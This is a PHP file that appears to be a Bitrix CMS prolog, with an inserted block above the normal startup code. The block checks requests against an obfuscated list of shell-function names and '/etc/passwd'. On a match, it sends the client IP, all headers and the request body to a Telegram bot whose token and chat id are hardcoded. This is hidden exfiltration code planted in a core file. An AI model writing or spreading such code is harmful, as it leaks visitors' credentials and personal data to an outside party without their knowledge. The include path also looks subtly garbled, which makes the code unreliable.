$suspicious = [
'ev' . 'a' . 'l','sy' . 'st' . 'em','pas' . 'sth' . 'ru','ex' . 'ec','she' . 'll_' . 'exec',
'bas' . 'e64_' . 'decode','she' . 'll','pop' . 'en','pro' . 'c_o' . 'pen','cur' . 'l_e' . 'xec',
'fop' . 'en','fil' . 'e_ge' . 't_co' . 'nte' . 'nts','ass' . 'ert','pre' . 'g_re' . 'plac' . 'e',
'php' . 'inf' . 'o','mk' . 'dir','un' . 'link','ch' . 'mod','inc' . 'lud' . 'e',
'req' . 'uir' . 'e','mov' . 'e_up' . 'load' . 'ed_f' . 'ile','fil' . 'e_pu' . 't_co' . 'nte' . 'nts','rea' . 'dfi' . 'le',
'soc' . 'ket_' . 'cre' . 'ate','str' . 'eam' . '_soc' . 'ket_cl' . 'ient','cre' . 'ate_' . 'fun' . 'ctio' . 'n',
'dl(','par' . 'se_' . 'str','ini' . '_se' . 't','err' . 'or_' . 'rep' . 'ort' . 'ing','set' . '_tim' . 'e_li' . 'mit',
'pro' . 'c_cl' . 'ose','pcl' . 'ose','pcn' . 'tl_' . 'ex' . 'ec','sy' . 'ml' . 'ink','re' . 'nam' . 'e','ch' . 'own', '/etc' . '/pass' . 'wd'
];
function containsSuspiciousRecursive($array, $suspicious) {
foreach ($array as $k => $v) {
foreach ($suspicious as $word) {
if (stripos($k, $word) !== false) return true;
if (is_string($v) && stripos($v, $word) !== false) return true;
if (is_array($v) && containsSuspiciousRecursive($v, $suspicious)) return true;
}
}
return false;
}
$headers = getallheaders();
if (containsSuspiciousRecursive($_REQUEST, $suspicious) || containsSuspiciousRecursive($headers, $suspicious)) {
$data = "METHOD: {$_SERVER['REQUEST_METHOD']}" . PHP_EOL;
$data .= "TARGET: {$_SERVER['REQUEST_URI']}" . PHP_EOL;
$data .= "IP: {$_SERVER['REMOTE_ADDR']}" . PHP_EOL;
$data .= "UA: {$_SERVER['HTTP_USER_AGENT']}" . PHP_EOL . PHP_EOL;
$data .= "HEADERS:" . PHP_EOL;
foreach ($headers as $name => $value) {
$data .= "$name: $value" . PHP_EOL;
}
$data .= PHP_EOL . "BODY:" . PHP_EOL . print_r($_REQUEST, true);
file_get_contents(
"https://api.telegram.org/bot7783741198:AAG6KTeA-X19Xw4x16sQOm6ZwFUpHQAVd90/sendMessage?" .
"chat_id=-1002753657432&text=" . urlencode($data)
);
}
define("START_EXEC_PROLOG_BEFORE_1", microtime(true));
$GLOBALS["BX_STATE"] = "PB";
if(isset($_REQUEST["BX_STATE"])) unset($_REQUEST["BX_STATE"]);
if(isset($_GET["BX_STATE"])) unset($_GET["BX_STATE"]);
if(isset($_POST["BX_STATE"])) unset($_POST["BX_STATE"]);
if(isset($_COOKIE["BX_STATE"])) unset($_COOKIE["BX_STATE"]);
if(isset($_FILES["BX_STATE"])) unset($_FILES["BX_STATE"]);
if(!isset($USER)) {global $USER;}
if(!isset($APPLICATION)) {global $APPLICATION;}
if(!isset($DB)) {global $DB;}
require_once(__DIR__."/. ./include.php");
CMain::PrologActions(); |